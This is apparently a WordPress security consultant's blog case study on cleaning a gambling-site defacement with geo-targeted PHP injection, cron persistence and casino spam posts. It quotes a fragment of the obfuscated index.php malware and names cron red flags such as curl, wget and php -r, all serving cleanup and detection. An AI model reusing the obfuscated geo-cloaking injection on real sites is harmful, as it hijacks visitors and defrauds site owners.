WordPress Homepage Replaced With a Gambling Site? Inside a Real Defacement Attack With 53,771 Infected Files (Case Study)

If you’ve opened your WordPress website and instead of your real homepage you’re seeing a gambling site, casino interface, “Hacked by [name]” message, or any other content you didn’t put there — your site has been defaced. Homepage defacement is one of the most damaging WordPress hacks because every visitor, every customer, every Google Ad click lands on the attacker’s content instead of your business. The fix isn’t deleting the visible fake page — that almost never works because the malware regenerates from a hidden persistence mechanism (typically a cron job, a backdoor PHP file, or thousands of injected files scattered across the hosting account). The real cleanup requires identifying the persistence layer, removing it, then restoring the legitimate homepage and hardening every entry point the attacker used.

A specific kind of email arrives in my inbox more often than any other type of WordPress security crisis: “I just opened my own website and it’s showing a gambling site.” Sometimes it’s “Hacked by [hacker name]” splashed across a black background. Sometimes it’s a fake casino interface with slot machines and aggressive call-to-action buttons. Sometimes the homepage looks completely normal to the owner but customers keep reporting they see something else entirely.

This is WordPress homepage defacement, and it’s one of the most damaging attacks a business website can suffer. Visitors can’t reach your real content. Google Ads campaigns burn budget driving traffic to the attacker’s page. Customers lose trust in the brand. Search engines may flag the domain. Every minute the defacement is live costs measurable money.

This case study walks through how I cleaned a real defacement attack that combined three of the most aggressive techniques I’ve seen in the same incident: 53,771 infected files, a geo-targeted fake gambling page, 12,000+ injected casino spam posts, and a cron job that regenerated the entire infection after each cleanup attempt. By the end you’ll know what to look for, how to diagnose which defacement variant you’re dealing with, and what the cleanup actually requires — because the visible fake page is almost never the whole story.

If your WordPress site has been defaced and you need urgent help, my WordPress malware removal service handles exactly this kind of incident.

What WordPress Homepage Defacement Actually Means

“Defacement” is the security industry term for any attack where the legitimate website content is replaced or hijacked with attacker-controlled content. On WordPress, it shows up in five recognizable patterns:

1. “Hacked by [name]” defacement. The classic — homepage replaced with a black page, hacker signature, sometimes political or trolling messages. Often comes with thousands of identical signature files scattered across the account.
2. Gambling/casino site replacement. Your homepage is replaced with a fake casino interface, slot machine page, or sportsbook landing. This is currently the most common variant I see — gambling spam exploded in volume after 2023.
3. Geo-targeted defacement. The fake page loads only for visitors from specific countries. The owner viewing from their own location sees a normal site; visitors elsewhere see the hack. This is particularly destructive because it stays invisible to whoever can fix it.
4. Search-engine defacement. Google indexes thousands of fake spam pages on your domain (Japanese keywords, pharma terms, casino spam). Visitors arriving directly see your real site, but search visibility is destroyed.
5. Wholesale page replacement. Legitimate posts and pages are replaced with attacker content rather than supplemented. A real article becomes a casino landing page that keeps the same URL.

The case in this study combined elements of types 2, 3, and 4 into a single coordinated attack — making it a useful map of how serious defacement campaigns actually operate.

The Client’s Situation: Three Days From Disaster to Cleanup

The business was running paid Google Ads campaigns. For roughly 6 to 8 hours, every visitor clicking those ads was landing on a fake JAKARTASLOT88 gambling page instead of the real business website. Ad spend was being burned. Customer trust was eroding. The brand was being publicly associated with online gambling.

When I got access, the scope of the compromise was shocking even by defacement standards:

• The visible homepage was serving a complete gambling interface with slot machine graphics
• The malware was checking visitor geolocation and only showing the fake page to specific countries (Indonesia and the United States, in this case)
• An initial server scan flagged 53,771 infected files across the hosting account
• Thousands of .txt defacement files were scattered across cPanel directories with the signature Hacked by L4663r6666h05t x Single Attacker
• The WordPress database had been polluted with spam content as well
• Even after standard file-level cleanup attempts, the malware regenerated

This was not a single-file fix. It was an account-wide compromise with multiple persistence mechanisms running in parallel. Cleanups that succeed on attacks like this share one quality: they treat the visible defacement as a symptom, not the disease.

How the Defacement Was Actually Working

Three coordinated mechanisms made this attack survive normal cleanup attempts:

Mechanism 1: Geo-Targeted PHP Injection in index.php

The core payload was hidden inside the WordPress index.php file using heavily obfuscated PHP. Once decoded, the logic was straightforward: the malware harvested the visitor’s IP, looked it up via ip-api.com, and only served the fake gambling page to visitors from selected countries. To everyone else, the site loaded normally.

Here’s what the obfuscated injection looked like in the file:

goto P1kOa; E5FKM: $nZuEo = puO1P(); goto yc4Bj;

ee0Ow: $CfnXq = file_get_contents($kES4i); goto FBVGD;

q2wU5: if (!($zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x49\x44"
    || $zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x55\x53"))
{ goto eqXVk; } goto h37vR;

iV6IJ: include "\x69\x6e\x64\x65\x78\x2d\x31\x2e\x68\x74\x6d\x6c"; goto ewSKG;

The hex-encoded strings reveal the intent:

• countryCode — the malware was checking visitor country
• ID / US — Indonesia and the United States were specifically targeted
• index-1.html — the fake gambling page was loaded from a local HTML file deployed alongside index.php

This is what made the attack so hard to diagnose. The site owner viewing from their own location (likely outside ID and US) saw a normal-looking homepage. Customers and Google Ads visitors from the targeted geographies saw the hijacked gambling page. The infection was effectively invisible to whoever had the authority to fix it.

For broader coverage of how attackers use cloaking and geo-targeting, see WordPress cloaking malware removal case study and why a website shows the wrong content after malware infection.

Mechanism 2: Defacement Marker Files Across the Entire Account

Working through the hosting account, I found thousands of seemingly harmless .txt files scattered across cPanel — including in directories that had nothing to do with WordPress. Each one contained the same defacement message: Hacked by L4663r6666h05t x Single Attacker.

These files weren’t directly powering the visible gambling page. But they told me two critical things:

• The attacker had write access to a very large portion of the hosting environment, not just the WordPress installation
• The infection was not isolated to one plugin or one theme — it had touched the entire account

That instantly changed the cleanup scope. This wasn’t a “fix the WordPress site” problem. It was an “audit the entire hosting account” problem, with strong signs of mass tampering and likely persistence in places I hadn’t found yet.

Mechanism 3: A cPanel Cron Job Regenerating the Infection

This is the persistence mechanism that traps most DIY cleanup attempts on defacement attacks. Even after I cleaned the file-level malware, replaced infected core files, removed the geo-targeted index.php injection, and ran the standard WordPress hardening sequence — the malware came back.

That’s the fingerprint of cron-based persistence. Standard malware scanners check files. They check the database. Most of them never check the hosting account’s scheduled task list. Attackers know this and routinely plant cron jobs that:

• Run every few minutes
• Re-download the malicious payload from an attacker-controlled server
• Re-inject the obfuscated PHP into index.php
• Recreate the defacement marker files
• Re-add hidden admin users to the WordPress database

When malware reappears within hours of cleanup, treat it as cron persistence until proven otherwise. I documented the cron-loop pattern in detail in why WordPress malware keeps coming back and how to stop it forever — that’s the companion piece to this case study.

I logged into the cPanel cron interface and found a recurring task running a script that triggered exactly the regeneration behavior. Removing it was the turning point of the entire cleanup. Until that cron task was gone, every visible cleanup was temporary.

The Companion Attack: 12,000 Casino Spam Posts

While the visible defacement was the urgent crisis, a second attack vector was running in parallel on this site (and on a separate Polylang-based multilingual site I worked on with similar characteristics): thousands of casino and gambling posts injected directly into the WordPress database.

This is the SEO-poisoning side of defacement campaigns. While the homepage hijack steals current traffic, the injected spam posts steal future traffic by polluting the domain’s search index. On the multilingual site I cleaned in a related case, more than 12,000 spam posts had been injected — enough to push the legitimate content out of Google’s indexed results and break the site’s Polylang language switching.

The pattern in both cases was identical:

• Spam posts injected directly into wp_posts with gambling-related titles and content
• Associated wp_postmeta entries created to make them appear as legitimate posts
• SEO-friendly URLs designed to rank for casino, slot, and gambling search terms
• Often using the site’s existing authority to push the spam content into Google’s index

For owners of sites hit with similar large-scale spam injections, see also how I removed 10,500 SEO spam URLs from Google in 12 days and cleaning a WordPress site from 3.45 million Matbet SEO spam URLs.

The Cleanup, Phase by Phase

Cleanups at this scale require strict ordering. Skipping steps is how cleanups fail and have to be redone three or four times before they hold.

Phase 1: Containment (Don’t Touch Anything Yet)

Before removing a single file, I:

1. Enabled maintenance mode so visitors saw a placeholder while cleanup ran
2. Took a complete backup snapshot of the site files and database — even though the site was infected, this preserves evidence
3. Saved samples of the defacement files, the obfuscated index.php injection, and the malicious cron job for forensic reference
4. Documented the visible behavior and confirmed the geo-targeted scope

Speed-of-cleanup matters less than thoroughness on incidents this size. Rushing past containment means losing evidence you might need later.

Phase 2: Surgical Removal of the Visible Defacement

With evidence preserved, I started with the file-level cleanup. The defacement marker files were the easiest target — bulk removal via SSH:

find /home/client/public_html -type f -name '*.txt' \
  -exec grep -l 'Hacked by L4663r6666h05t' {} \; | xargs rm -f

Then I worked through:

• Replacing the compromised index.php with a clean WordPress version
• Replacing all WordPress core files with verified clean originals from WordPress.org
• Removing the local index-1.html file that contained the gambling interface
• Auditing every theme and plugin file for additional obfuscated injections
• Checking the database for malicious entries in wp_options and wp_postmeta
• Verifying that the visible gambling content was no longer being served from any country

For approaches to mass file cleanup at this scale, see how I cleaned 12,718 malware-infected PHP files in 5 minutes using VS Code.

Phase 3: Remove the Persistence Mechanisms

This is where most DIY defacement cleanups fail. The site looked clean after Phase 2 — but the malware came back within hours during my testing window. That confirmed cron-based persistence.

I logged into cPanel’s cron job interface and reviewed every scheduled task on the account. The malicious entry was disguised as a routine maintenance task with an innocuous-sounding name, but it was scheduled to run every few minutes and was calling out to an attacker-controlled server. I removed the cron job, then re-ran the file cleanup to remove anything it had regenerated during the testing window.

After cron removal, I also audited:

• Hidden admin users in wp_users (the cron job had created several backup accounts) — see how to find and remove hidden admin users
• Database injections in wp_options that could re-trigger infection
• Backdoor PHP files outside the WordPress directory (the cron job had been calling one of these)
• WordPress security keys (rotated to invalidate any active attacker sessions)

Phase 4: Database Cleanup of Spam Content

For the related multilingual site with 12,000+ injected casino posts, this phase was the largest by volume. WordPress’s bulk-edit tools timed out on this many records, so the cleanup ran via direct database queries to delete spam posts and their associated metadata atomically — preserving legitimate content while purging gambling spam.

For broader database malware cleanup, see how to scan and clean your WordPress database for hidden malware.

Phase 5: Restore the Real Homepage

With all defacement layers removed, the WordPress site rendered the legitimate homepage again. I verified by:

• Loading the site from multiple geographic locations using VPN to confirm the geo-targeting was no longer active
• Testing through different user agents (mobile, desktop, search engine bot) to rule out conditional injections I might have missed
• Running a fresh malware scan against the cleaned environment
• Confirming that ad-targeted landing pages loaded correctly for the campaign’s intended audiences

Phase 6: Hardening (So It Doesn’t Come Back)

The final and most important phase. The defacement happened because something in the original environment let an attacker in. Without closing that gap, the cleanup is just a reset before the next compromise.

• Updated WordPress core, all plugins, and the active theme to current versions
• Removed inactive plugins and abandoned themes that increased the attack surface
• Replaced any nulled/pirated software with legitimate copies — see why nulled plugins are a security disaster
• Rotated every credential — WordPress admin, hosting cPanel, FTP/SFTP, database user
• Enabled two-factor authentication on WordPress and cPanel
• Set up off-site backups (in-site backups can be deleted along with everything else in destructive attacks)
• Configured file integrity monitoring with alerts on changes to index.php and other critical files
• Installed a Web Application Firewall
• Reviewed and audited cPanel cron jobs as part of standard security checks (this is now part of every monthly review for the client)

For the complete post-cleanup checklist, see what to do after fixing a hacked WordPress site.

Results

• ✅ Real homepage restored within ~90 minutes of starting the active cleanup
• ✅ All 53,771 infected files cleaned or replaced
• ✅ Defacement marker files removed from across the entire hosting account
• ✅ Geo-targeted index.php injection removed
• ✅ Malicious cPanel cron job removed (the persistence mechanism that was breaking earlier cleanup attempts)
• ✅ 12,000+ casino/gambling spam posts removed from the related multilingual site cleanup
• ✅ Polylang multilingual functionality restored on that companion case
• ✅ Hidden admin users removed
• ✅ Site verified clean from multiple geographic locations
• ✅ Google Ads traffic returned to landing on legitimate pages
• ✅ Site hardened with 2FA, WAF, off-site backups, file integrity monitoring

The total active cleanup window was about half a day for the file-and-cron work, with the database spam cleanup on the related multilingual site taking longer due to volume. The fastest meaningful win came from removing the cron job — once that was gone, every subsequent cleanup step actually held.

What Site Owners Should Take Away

If you’re reading this because your homepage has been defaced, the patterns from this cleanup that apply to almost every defacement case:

• The visible fake page is rarely the whole infection. The marker files, cron jobs, backdoor PHP, and database injections are usually all running in parallel. Cleaning only the visible page sets up reinfection within hours.
• If the malware comes back after cleanup, look for cron jobs first. This is the most commonly missed persistence mechanism in defacement attacks. Standard malware scanners don’t check cPanel scheduled tasks.
• Geo-targeting makes diagnosis harder. If your site looks fine to you but customers report it’s broken, test from a VPN in different countries. The defacement may only be visible to specific geographies.
• Account-wide audits matter. Defacement attacks routinely scatter marker files into directories that have nothing to do with WordPress. Limit your cleanup to public_html and you’ll miss artifacts in subdomains, mail directories, and old folders.
• Speed matters financially. Every hour your homepage is replaced costs ad spend, customer trust, and SEO authority. Defacement is the single most expensive attack class per hour of downtime.
• The casino/gambling variant has exploded since 2023. If your site has been hit with gambling content (homepage replacement, post injection, or both), you’re part of a much larger campaign. The technical patterns are now well-documented and predictable to professional cleaners.

FAQ

Why is my WordPress homepage suddenly showing a gambling site?

Your site has been defaced — an attacker has replaced or hijacked your real homepage with their own content, almost always to monetize through fake gambling traffic. The replacement is typically done by injecting code into your WordPress index.php file, deploying a fake HTML page alongside it, and using geo-targeting so the fake content shows for visitors from specific countries. Your scanner may not detect it because the injection is heavily obfuscated and the fake page may not show on your own connection.

I deleted the fake gambling page and the next day it came back. Why?

Because the visible page wasn’t the source of the infection — it was being regenerated by a hidden persistence mechanism. The most common cause on these attacks is a malicious cPanel cron job running every few minutes that re-creates the infection from a remote payload. Other causes include backdoor PHP files in the uploads folder, hidden admin users in the WordPress database, and modified core files outside the obvious infection points. Until you find and remove the persistence layer, the defacement will keep returning.

How do I check my cPanel cron jobs for malicious entries?

Log into cPanel and navigate to Advanced → Cron Jobs. Review every scheduled task. Be suspicious of anything you don’t remember setting up, especially if the command involves curl, wget, php -r, or calls to unfamiliar URLs. Anything running at very short intervals (every minute, every 5 minutes) on a small business site is also worth investigating. Document any entries before deleting them — the URLs they call may help identify other infected sites the same attacker hit.

The site looks fine on my computer but customers say it’s hacked. What’s happening?

That’s geo-targeted defacement — the malicious code checks each visitor’s country (or other criteria like user agent or referrer) and only shows the fake page to specific groups. The owner viewing from their own location often falls outside the targeted set, so the site looks normal to them while customers, ad traffic, and search engine crawlers see something completely different. Test your site from a VPN with locations in different countries to verify.

Will my Google Ads account be penalized for sending traffic to a defaced page?

It can be. Google’s ad policies prohibit ads landing on hacked or malicious content. If Google detects that your ad destination is serving gambling, malware, or deceptive content, ads can be disapproved or the entire account can be suspended. The faster you clean the defacement and notify Google through Search Console, the lower the risk of advertising consequences. In the meantime, pause active campaigns until cleanup is verified.

Can a defaced website affect my Google search rankings?

Yes — significantly. Defacement often comes paired with mass spam content injection (the “12,000 casino posts” pattern) that floods your domain with low-quality content Google will eventually flag. Even without the spam injection, a homepage replacement that shows for Googlebot will be re-indexed as the new content, replacing your legitimate listings. Defaced sites also frequently end up on Google’s Safe Browsing blocklist, which causes “This site may be hacked” warnings in search results that destroy click-through rates. SEO recovery after defacement typically takes weeks to months even after the technical cleanup is complete.

How long does a defacement cleanup typically take?

For small-to-medium WordPress sites with the standard pattern (homepage replacement + cron job + a few thousand marker files), a thorough cleanup is usually 4–8 hours of focused work. For larger sites with database spam injection at the 10,000+ posts scale, the database cleanup phase alone can extend to a full day or more. The fastest meaningful result — getting the real homepage back online for visitors — typically takes 1–2 hours once the persistence mechanism is identified.

What’s the difference between defacement and a regular WordPress hack?

A regular WordPress hack often runs in the background — backdoors, redirect malware, SEO spam — while the visible site continues to function normally. Defacement specifically targets the visible content, replacing or hijacking what visitors see. Both are serious, but defacement causes faster business damage because it’s immediately visible to every customer. Most defacement attacks also include the regular hack components (backdoors, SEO spam, persistence mechanisms) underneath the visible defacement.

Should I just delete WordPress and reinstall after defacement?

Not without preserving the database first. The WordPress database holds your posts, pages, settings, and user accounts — none of that is in WordPress core files. A complete reinstall without database export will lose every piece of legitimate content. The correct approach is: export the clean parts of the database, set up a fresh WordPress installation, import the cleaned database into the new install, reinstall themes and plugins from clean sources, then verify everything works before going live. For the broader recovery process, see how to recover when WordPress files have been deleted.

Related Reading

• WordPress Malware Removal Service
• Why WordPress malware keeps coming back (the cron persistence pattern)
• Website showing wrong content — geo-targeting and cloaking
• WordPress cloaking malware removal case study
• How to scan and clean your WordPress database for hidden malware
• How to find and remove hidden admin users
• How I removed 10,500 SEO spam URLs from Google in 12 days
• How I cleaned 12,718 malware-infected PHP files in 5 minutes
• What to do after fixing a hacked WordPress site

Need Help With a Defaced WordPress Site?

Homepage defacement is one of the highest-stakes WordPress security incidents because every minute of damage compounds — lost ad spend, eroded customer trust, SEO penalties, brand association with gambling or hacker signatures. The longer it stays live, the more expensive the recovery becomes.

I’ve cleaned more than 4,500 hacked WordPress sites since 2018, including dozens of large-scale defacement attacks like the one in this case study. If your homepage is showing a gambling site, a “hacked by” message, or any content you didn’t put there, this is exactly the kind of incident I work on every week.

Get Expert WordPress Malware Removal — or contact me directly via the hire me page.